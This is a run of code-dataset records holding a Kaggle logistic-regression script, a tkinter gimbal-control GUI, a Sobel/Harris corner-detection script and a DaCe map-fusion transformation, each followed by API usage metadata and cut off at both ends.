[('name','!=','id'),('model_id.model','=',self.reporting_id),'|',('ttype','=','float'),('ttype','=','integer')],\n }\n }\n return result", "sub_path": "beta-dev1/auto_send_report/models/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 18960, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "odoo.models.Model", "line_number": 15, "usage_type": "attribute"}, {"api_name": "odoo.models", "line_number": 15, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 18, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 18, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 32, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 32, "usage_type": "name"}, {"api_name": "odoo.fields.Many2one", "line_number": 33, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 33, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 
34, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 34, "usage_type": "name"}, {"api_name": "odoo.fields.Many2many", "line_number": 35, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 35, "usage_type": "name"}, {"api_name": "odoo.fields.Selection", "line_number": 36, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 36, "usage_type": "name"}, {"api_name": "odoo.fields.Date", "line_number": 41, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 41, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 41, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 52, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 52, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 53, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 53, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 53, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 53, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 53, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 43, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 43, "usage_type": "name"}, {"api_name": "datetime.datetime.strptime", "line_number": 67, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 67, "usage_type": "name"}, {"api_name": "odoo.fields.Date.today", "line_number": 67, "usage_type": "call"}, {"api_name": "odoo.fields.Date", "line_number": 67, "usage_type": "attribute"}, {"api_name": "odoo.fields", "line_number": 67, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 69, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 71, "usage_type": "call"}, {"api_name": "datetime.timedelta", "line_number": 73, "usage_type": "call"}, {"api_name": "odoo.api.multi", "line_number": 64, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 64, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 80, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 80, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 88, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 88, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 110, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 112, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 112, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 114, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 114, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 116, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 116, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 125, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 98, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 98, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 188, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 188, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 199, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 199, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 216, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 218, "usage_type": 
"call"}, {"api_name": "odoo.fields", "line_number": 218, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 220, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 220, "usage_type": "name"}, {"api_name": "odoo.fields.append", "line_number": 222, "usage_type": "call"}, {"api_name": "odoo.fields", "line_number": 222, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 233, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 253, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 284, "usage_type": "argument"}, {"api_name": "odoo.api.model", "line_number": 203, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 203, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 288, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 288, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 302, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 312, "usage_type": "name"}, {"api_name": "odoo.fields", "line_number": 368, "usage_type": "argument"}, {"api_name": "odoo.api.model", "line_number": 296, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 296, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 372, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 372, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 377, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 377, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 381, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 381, "usage_type": "name"}, {"api_name": "odoo.api.multi", "line_number": 385, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 385, "usage_type": "name"}, {"api_name": "xlwt.Workbook", "line_number": 424, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 426, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 427, "usage_type": "call"}, {"api_name": "xlwt.easyxf", "line_number": 428, "usage_type": "call"}, {"api_name": "collections.deque", "line_number": 436, "usage_type": "call"}, {"api_name": "odoo.tools.ustr", "line_number": 474, "usage_type": "call"}, {"api_name": "odoo.api.model", "line_number": 421, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 421, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 490, "usage_type": "call"}, {"api_name": "os.path", "line_number": 490, "usage_type": "attribute"}, {"api_name": "odoo.tools.config", "line_number": 490, "usage_type": "name"}, {"api_name": "odoo.api.model", "line_number": 488, "usage_type": "attribute"}, {"api_name": "odoo.api", "line_number": 488, "usage_type": "name"}, {"api_name": "odoo.tools.config", "line_number": 493, "usage_type": "name"}, {"api_name": "odoo.api.onchange", "line_number": 495, "usage_type": "call"}, {"api_name": "odoo.api", "line_number": 495, "usage_type": "name"}]} +{"seq_id": "428540748", "text": "import os\nimport pandas as pd\n\ndata_dir= 'C:/Users/user/Desktop/class/maching learning/project/group/Don-t_Overfit_PolyU/dataset'\n\n# features selected by RFECV with lasso\nfeatures = ['16', '33', '43', '45', '52', '63', '65', '73', '90', '91', '117', '133',\n '134', '149', '189', '199', '217', '237', '258', '295']\n\n#observe train data\nfilenameTrain=os.path.join(data_dir,'train.csv')\ntrain=pd.read_csv(filenameTrain)\n\n#observe test 
data\nfilenameTest=os.path.join(data_dir,'test.csv')\ntest=pd.read_csv(filenameTest)\n\n#load prepared data\ndef get_train_data():\n train=pd.read_csv(filenameTrain,index_col=0) # use the first column as the index (instead of the default index)\n x_train=train.iloc[:,1:] # every row, all columns except target\n y_train=train['target']\n return x_train,y_train\n\ndef get_test_data():\n test=pd.read_csv(filenameTest,index_col=0) # use the first column as the index (instead of the default index)\n #test=test[features]\n return test\n \n \nx_train0,y_train=get_train_data()\ntest=get_test_data()\n\n\n# Feature scaling is required before using Logistic Regression\n# sklearn.preprocessing.StandardScaler keeps the parameters learned from the training set (mean, variance), so the same object can be used to transform the test data.\nfrom sklearn.preprocessing import StandardScaler\nscaler=StandardScaler()\nx_train=pd.DataFrame(scaler.fit_transform(x_train0),columns=x_train0.columns,index=x_train0.index)\ntest=pd.DataFrame(scaler.transform(test),columns=test.columns,index=test.index) # reuse the training-set parameters (transform, not fit_transform)\n\n#logistic regression\nfrom sklearn.linear_model import LogisticRegression\nlog = LogisticRegression(\n penalty='l1', # l1: Laplace prior; l2: Gaussian prior\n dual=False,\n tol=1e-4,\n C=0.2, # smaller values mean stronger regularization, which helps prevent overfitting; tried 1.0/0.5/0.3/0.2/0.1\n fit_intercept=False, # whether to add a constant (bias or intercept) to the decision function\n intercept_scaling=1, # only useful when the solver is 'liblinear' and fit_intercept is True\n class_weight='balanced',#{0:0.4,1:0.6}, # e.g. for a binary 0/1 model, class_weight={0:0.9,1:0.1} weights class 0 at 90% and class 1 at 10%; options: None/{0:0.9,1:0.1}/balanced\n random_state=None,\n solver='liblinear', # liblinear suits small datasets; sag and saga are faster on large ones; options: liblinear/saga/newton-cg/lbfgs/sag\n max_iter=100, # maximum number of iterations for convergence; only used by the newton-cg, sag and lbfgs solvers\n multi_class= 'ovr', # ovr/multinomial for multi-class problems\n verbose=0, # print the model progress\n warm_start=False, # if True, the next fit reuses the previous call's solution as initialization\n n_jobs=1 # number of CPU cores used; 1 uses one core, 2 uses two, -1 uses all cores\n )\n\n\nlog.fit(x_train,y_train)\n\n\n#result\nprediction = log.predict(test)\nprediction = pd.DataFrame(prediction)\nprediction.index += 250\nprediction.columns = ['target']\nprediction.to_csv('C:/Users/user/Desktop/class/maching learning/project/group/Don-t_Overfit_PolyU/result/Logistic Regression(feature_select).csv', index_label='id', index=True)\n", "sub_path": "Logistic Regression.py", "file_name": "Logistic Regression.py", "file_ext": "py", "file_size_in_byte": 3250, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.path.join", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 26, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 38, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LogisticRegression", "line_number": 44, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "384793108", "text": "import gimbal as gb\nimport serial\nimport serial.tools.list_ports as lp\nimport tkinter as tk\nfrom tkinter import ttk, messagebox\n\nLARGE_FONT = (\"Verdana\", 12)\nFILL_HOZ = tk.W+tk.E+tk.N+tk.S\n\n\nclass 
gimbalApp(tk.Tk):\n def __init__(self, *args, **kwargs):\n #--------------------tk setup--------------------\n tk.Tk.__init__(self, *args, **kwargs)\n tk.Tk.wm_title(self, \"DDC Gimbal Controller\")\n container = tk.Frame(self)\n container.pack(side=\"top\", fill=\"both\", expand=True)\n container.grid_rowconfigure(0,weight=1)\n container.grid_columnconfigure(0,weight=1)\n \n #------------------frame setup-------------------\n self.frames = {}\n self.frame = StartPage(container,self)\n frames = [StartPage]\n #for F in frames:\n # frame = F(container,self)\n # self.frames[F] = frame\n self.frame.grid(row=0,column=0, sticky=\"nswe\")\n self.frame.tkraise()\n self.frame.disable_buttons()\n\n #-----------------menubar setup------------------\n menubar = tk.Menu(container)\n \n self.connmenu = tk.Menu(menubar, tearoff=0) \n self.connmenu.add_cascade(label=\"COM Port\")\n self.connmenu.add_command(label=\"Connect\", command=lambda:self._connect_gimbal())\n \n self.connmenu.add_separator()\n self.connmenu.add_command(label=\"Scan\", command=lambda:self._refresh_ports(menubar))\n \n menubar.add_cascade(label=\"Connect\", menu=self.connmenu)\n\n tk.Tk.config(self, menu=menubar)\n self.connmenu.entryconfig(1, state=\"disabled\")\n\n self._refresh_ports(menubar)\n\n def disconnect(self):\n try:\n self.gimbal.close()\n except Exception as e:\n pass\n self.frame.disconnect()\n self.frame.update()\n self.connmenu.entryconfig(0, state=\"normal\")\n self.connmenu.entryconfig(1, state=\"disabled\")\n self.connmenu.entryconfig(3, label=\"Scan\")\n\n def _refresh_ports(self,root):\n self.disconnect()\n comports = lp.comports()\n self.ports = []\n portmenu = tk.Menu(root, tearoff=0)\n for i in range(len(comports)):\n self.ports.append(comports[i].device)\n portmenu.add_command(label=self.ports[i],\n command=lambda i=i:self._connect_command(index=i))\n\n self.connmenu.entryconfig(0, menu=portmenu)\n \n\n def _connect_command(self, index):\n print(index)\n self.connmenu.entryconfig(1, state=\"normal\")\n self.select = index\n\n def _connect_gimbal(self):\n try:\n self.frame.update_status(\"connecting\")\n self.frame.update()\n print('Trying to connect')\n self.gimbal = gb.Gimbal(self.ports[self.select])\n except Exception as e:\n print(str(e))\n tk.messagebox.showerror(\"Connection Error\", \"Could not connect to gimbal\")\n self.disconnect()\n else:\n print('hi')\n self.frame.enable_buttons()\n \n self.connmenu.entryconfig(0, state=\"disabled\")\n self.connmenu.entryconfig(1, state=\"disabled\")\n self.connmenu.entryconfig(3, label=\"Disconnect\")\n self.frame.update_status(\"connected\")\n\n def gimbal_power(self, value):\n if value == 0 or value == 1:\n self.gimbal.set_enable(value)\n\n def gimbal_direction(self, value):\n if value == 0 or value == 1:\n try:\n self.gimbal.set_direction(value)\n except serial.serialutil.SerialException:\n self.disconnect()\n tk.messagebox.showerror(\"Connection Error\", \"Gimbal disconnected\")\n def gimbal_position(self, value):\n self.gimbal.set_position(value)\n\n\nclass StartPage(tk.Frame):\n def __init__(self, parent, controller):\n self._row_count = 0\n \n tk.Frame.__init__(self,parent)\n\n status_frame = self._add_labelframe(self,\"\", 0, self._get_row(), 2)\n \n label = tk.Label(status_frame, text=\"Status:\", font=LARGE_FONT)\n label.grid(column=0, row=0, pady=10, padx=10, sticky=tk.E)\n\n self.status_label = tk.Label(status_frame, font=LARGE_FONT, text=\"Disconnected\", foreground = \"red\")\n self.status_label.grid(column=1, row=0, pady=10, padx=10, 
sticky=tk.W)\n\n data_frame = self._add_labelframe(self, \"Gimbal Data\", 0, self._get_row(), 2)\n\n testlabel = tk.Label(data_frame, text=\"Test\", font=LARGE_FONT)\n testlabel.grid(column=0, row=0, padx=10, sticky=FILL_HOZ)\n\n entry_text = tk.StringVar()\n testentry = tk.Entry(data_frame, state='disabled', textvariable = entry_text, font=LARGE_FONT, width=10)\n testentry.grid(column=1, row=0, padx=10, pady=5, sticky=FILL_HOZ)\n entry_text.set(\"hello\")\n\n testlabel = tk.Label(data_frame, text=\"Test\", font=LARGE_FONT)\n testlabel.grid(column=2, row=0, padx=10, sticky=FILL_HOZ)\n\n entry2_text = tk.StringVar()\n testentry2 = tk.Entry(data_frame, state='disabled', textvariable = entry2_text, font=LARGE_FONT, width=10)\n testentry2.grid(column=3, row=0, padx=10, pady=5, sticky=FILL_HOZ)\n entry2_text.set(\"hi\")\n \n movement_frame = self._add_labelframe(self, \"Gimbal Movement\", 0, self._get_row(), 1)\n\n self.buttons = []\n \n self.enable = tk.IntVar()\n self._add_radiobtn(\"Enable\", movement_frame, self.enable, 1,\n lambda:self._power_btn_resp(1, controller), 0, 0)\n self._add_radiobtn(\"Disable\", movement_frame, self.enable, 0,\n lambda:self._power_btn_resp(0, controller), 1, 0)\n\n\n direction_frame = self._add_labelframe(self, \"Gimbal Direction\", 0, self._get_row(), 1)\n \n self.direction = tk.IntVar()\n self._add_radiobtn(\"Normal\", direction_frame, self.direction, 1,\n lambda:controller.gimbal_direction(1),0,0)\n self._add_radiobtn(\"Inverted\", direction_frame, self.direction, 0,\n lambda:controller.gimbal_direction(0),1,0)\n\n self.enable.set(2)\n self.direction.set(2)\n \n position_frame = self._add_labelframe(self, \"Gimbal Position\", 1, 2, 1)\n\n self.position = tk.IntVar()\n self.slider = tk.Scale(position_frame, from_=0, to=180, orient=tk.HORIZONTAL,var=self.position,\n command=lambda i = self.position: self._position_resp(i, controller))\n self.position.set(90)\n self.slider.grid(column=0, row=0, padx=10, sticky=FILL_HOZ)\n\n def _get_row(self):\n self._row_count += 1\n return self._row_count - 1\n \n def _add_radiobtn(self, text, frame, var, val, cmd, col, row):\n btn = tk.Radiobutton(frame, font=LARGE_FONT, text=text, variable=var, value=val, command=cmd)\n btn.grid(column=col, row=row, padx=10, sticky=FILL_HOZ)\n self.buttons.append(btn)\n\n def _add_labelframe(self, root, text, col, row, col_span = 1):\n label_frame = tk.LabelFrame(root, text=text, font=LARGE_FONT)\n label_frame.grid(column=col, row=row, padx=10, pady=5, sticky=FILL_HOZ, columnspan = col_span)\n return label_frame\n\n def _position_toggle(self, val):\n if val == 0:\n self.position.set(90)\n self.slider.configure(state=\"disabled\")\n elif val == 1:\n self.slider.configure(state=\"normal\")\n\n def _position_resp(self, val, controller):\n try:\n controller.gimbal_position(int(val))\n except AttributeError:\n self._position_toggle(0)\n except serial.serialutil.SerialException:\n controller.disconnect()\n tk.messagebox.showerror(\"Connection Error\", \"Gimbal disconnected\")\n \n def _power_btn_resp(self, val, controller):\n if val == 0:\n self._position_toggle(1)\n elif val == 1:\n self._position_toggle(0)\n else:\n return\n controller.gimbal_power(val)\n \n def enable_buttons(self):\n for button in self.buttons:\n button['state'] = 'normal'\n\n def disable_buttons(self):\n for button in self.buttons:\n button['state'] = 'disabled'\n self.enable.set(3)\n self.direction.set(3)\n\n def disconnect(self):\n self.update_status(\"disconnected\")\n self.disable_buttons()\n self._position_toggle(0)\n \n 
def update_status(self, status):\n if status == \"disconnected\":\n self.status_label.configure(text=\"Disconnected\", foreground=\"red\")\n elif status == \"connecting\":\n self.status_label.configure(text=\"Connecting\", foreground=\"orange\")\n elif status == \"connected\":\n self.status_label.configure(text=\"Connected\", foreground=\"green\")\n\napp = gimbalApp()\n", "sub_path": "code/Python/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 8897, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "tkinter.W", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.E", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.N", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.S", "line_number": 8, "usage_type": "attribute"}, {"api_name": "tkinter.Tk", "line_number": 11, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.__init__", "line_number": 14, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 14, "usage_type": "attribute"}, {"api_name": "tkinter.Tk.wm_title", "line_number": 15, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 15, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 35, "usage_type": "call"}, {"api_name": "tkinter.Tk.config", "line_number": 44, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 44, "usage_type": "attribute"}, {"api_name": "serial.tools.list_ports.comports", "line_number": 62, "usage_type": "call"}, {"api_name": "serial.tools.list_ports", "line_number": 62, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 64, "usage_type": "call"}, {"api_name": "gimbal.Gimbal", "line_number": 83, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 86, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 86, "usage_type": "attribute"}, {"api_name": "serial.serialutil", "line_number": 105, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 107, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 107, "usage_type": "attribute"}, {"api_name": "tkinter.Frame", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tkinter.Frame.__init__", "line_number": 116, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 120, "usage_type": "call"}, {"api_name": "tkinter.E", "line_number": 121, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 123, "usage_type": "call"}, {"api_name": "tkinter.W", "line_number": 124, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 128, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 131, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 132, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 136, "usage_type": "call"}, {"api_name": "tkinter.StringVar", "line_number": 139, "usage_type": "call"}, {"api_name": "tkinter.Entry", "line_number": 140, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 148, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 157, "usage_type": "call"}, {"api_name": "tkinter.IntVar", "line_number": 168, "usage_type": "call"}, 
{"api_name": "tkinter.Scale", "line_number": 169, "usage_type": "call"}, {"api_name": "tkinter.HORIZONTAL", "line_number": 169, "usage_type": "attribute"}, {"api_name": "tkinter.Radiobutton", "line_number": 179, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 184, "usage_type": "call"}, {"api_name": "serial.serialutil", "line_number": 200, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 202, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 202, "usage_type": "attribute"}]} +{"seq_id": "187905412", "text": "import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\n# import util\nimport numpy as np\n\ndef convolve(image,kernel):\n return np.sum(np.multiply(image,kernel))\ndef corners():\n img=np.array(mpimg.imread('1.png'))\n print(img)\n rows = 50\n columns = 50\n Sx = np.zeros((rows,columns))\n Sy = np.zeros((rows,columns))\n Gx = np.array([np.array([-1,0,1]),np.array([-2,0,2]),np.array([-1,0,1])])\n Gy = np.array([np.array([-1,-2,-1]),np.array([0,0,0]),np.array([1,2,1])])\n\n for i in range(rows-2):\n for j in range(columns-2):\n Sx[i+1][j+1] = convolve(Gx,img[i:i+3,j:j+3])\n Sy[i+1][j+1] = convolve(Gy,img[i:i+3,j:j+3])\n Sx2 = np.multiply(Sx,Sx)\n Sxy = np.multiply(Sx,Sy)\n Sy2 = np.multiply(Sy,Sy)\n R = np.zeros((rows,columns))\n for i in range(rows):\n for j in range(columns):\n # print(\"Sx2[i,j],Sxy[i,j],Sxy[i,j],Sy2[i,j]\", Sx2[i,j],Sxy[i,j],Sxy[i,j],Sy2[i,j])\n H = np.array([np.array([Sx2[i,j],Sxy[i,j]]),np.array([Sx2[i,j],Sxy[i,j]])])\n d = np.linalg.det(H)\n k = 0.04\n t = H[0][0]+H[1][1]\n R[i,j] = abs(d) - k*(t**2)\n # print(\"d \",d,\" i \", i ,\" j \", j ,\" R[i,j] \", R[i,j])\n\n SS = np.sqrt(Sx2 + Sy2)\n for i in range(rows):\n for j in range(columns):\n print(\"i \",i,\"j \",j,\"SS[i][j] \",SS[i][j],\"Sx[i][j] \",Sx[i][j],\"Sy[i][j] \",Sy[i][j])\n plt.imshow(SS)\n plt.show()\n\n# def enhancedFeatureExtractorDigit(datum):\n# \"\"\"\n# Your feature extraction playground.\n\n# You should return a util.Counter() of features\n# for this datum (a unit of data)\n\n# ## DESCRIBE YOUR ENHANCED FEATURES HERE...\n \n# ##\n# \"\"\"\n\n# def getPixelVal(x, y):\n# \"\"\"\n# Helper Function to return the pixel value at location x, y\n# 1 : black\n# 0 : white\n# Refer to the basicFeatureExtractorDigit function for more Details\n# \"\"\"\n# return datum[x * DATUM_HEIGHT + y]\n\n# features = util.Counter()\n\n# # \"*** YOUR CODE HERE ***\"\n\n\n# # util.raiseNotDefined()\n\n# return features", "sub_path": "Lab1/classification/corners.py", "file_name": "corners.py", "file_ext": "py", "file_size_in_byte": 2121, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "numpy.sum", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.image.imread", "line_number": 9, "usage_type": "call"}, {"api_name": "matplotlib.image", "line_number": 9, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 23, "usage_type": "call"}, 
{"api_name": "numpy.multiply", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.linalg.det", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 30, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}]} +{"seq_id": "645711555", "text": "# Copyright 2019-2022 ETH Zurich and the DaCe authors. All rights reserved.\n\"\"\"\nThis module contains classes that implement subgraph fusion using on-the-fly recomputation\n\"\"\"\nimport dace\n\nfrom dace.transformation import transformation\nfrom dace.properties import make_properties, Property\nfrom dace.transformation.subgraph import helpers\n\nfrom collections import OrderedDict\n\nfrom dace.transformation.subgraph import OnTheFlyMapFusion\n\n\n@make_properties\nclass SubgraphOTFFusion(transformation.SubgraphTransformation):\n def can_be_applied(self, *args, **kwargs) -> bool:\n return True\n\n def apply(self, state: dace.SDFGState, sdfg: dace.SDFG):\n state_subgraph = dace.sdfg.state.StateSubgraphView(state, map(state.node, self.subgraph))\n map_entries = helpers.get_outermost_scope_maps(sdfg, state, state_subgraph)\n children_dict, parent_dict = self.topology(state, map_entries)\n\n fuse_counter = 0\n queue = [me for me in map_entries if me not in children_dict]\n while len(queue) > 0:\n child = queue.pop(0)\n if child not in parent_dict:\n continue\n\n parents = parent_dict[child]\n while len(parents) > 0:\n parent = parents.pop(0)\n fusion = OnTheFlyMapFusion(state, sdfg_id=sdfg.sdfg_id, state_id=sdfg.node_id(state))\n if fusion.can_be_applied(state, sdfg, parent, child):\n fusion.apply(state, sdfg, parent, child)\n fuse_counter += 1\n break\n else:\n queue.append(parent)\n\n queue.extend(parents)\n\n subgraph = []\n for node_id in self.subgraph:\n try:\n state.node(node_id)\n subgraph.append(node_id)\n except:\n pass\n\n self.subgraph = subgraph\n state_subgraph = dace.sdfg.state.StateSubgraphView(state, map(state.node, self.subgraph))\n map_entries = helpers.get_outermost_scope_maps(sdfg, state, state_subgraph)\n children_dict, parent_dict = self.topology(state, map_entries)\n\n return fuse_counter\n\n def topology(self, state, map_entries):\n children_dict = OrderedDict()\n parent_dict = OrderedDict()\n for map_entry in map_entries:\n map_exit = state.exit_node(map_entry)\n for e in state.out_edges(map_exit):\n if isinstance(e.dst, dace.nodes.AccessNode):\n for oe in state.out_edges(e.dst):\n if oe.dst in map_entries:\n other_entry = oe.dst\n\n if map_entry not in children_dict:\n children_dict[map_entry] = []\n children_dict[map_entry].append(other_entry)\n\n if other_entry not in parent_dict:\n parent_dict[other_entry] = []\n\n parent_dict[other_entry].append(map_entry)\n\n return children_dict, parent_dict\n", "sub_path": "dace/transformation/subgraph/map_fusion.py", "file_name": "map_fusion.py", "file_ext": "py", "file_size_in_byte": 3111, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": 
"dace.transformation.transformation.SubgraphTransformation", "line_number": 17, "usage_type": "attribute"}, {"api_name": "dace.transformation.transformation", "line_number": 17, "usage_type": "name"}, {"api_name": "dace.SDFGState", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dace.SDFG", "line_number": 21, "usage_type": "attribute"}, {"api_name": "dace.sdfg.state.StateSubgraphView", "line_number": 22, "usage_type": "call"}, {"api_name": "dace.sdfg", "line_number": 22, "usage_type": "attribute"}, {"api_name": "dace.transformation.subgraph.helpers.get_outermost_scope_maps", "line_number": 23, "usage_type": "call"}, {"api_name": "dace.transformation.subgraph.helpers", "line_number": 23, "usage_type": "name"}, {"api_name": "dace.transformation.subgraph.OnTheFlyMapFusion", "line_number": 36, "usage_type": "call"}, {"api_name": "dace.sdfg.state.StateSubgraphView", "line_number": 55, "usage_type": "call"}, {"api_name": "dace.sdfg", "line_number": 55, "usage_type": "attribute"}, {"api_name": "dace.transformation.subgraph.helpers.get_outermost_scope_maps", "line_number": 56, "usage_type": "call"}, {"api_name": "dace.transformation.subgraph.helpers", "line_number": 56, "usage_type": "name"}, {"api_name": "collections.OrderedDict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 63, "usage_type": "call"}, {"api_name": "dace.nodes", "line_number": 67, "usage_type": "attribute"}, {"api_name": "dace.properties.make_properties", "line_number": 16, 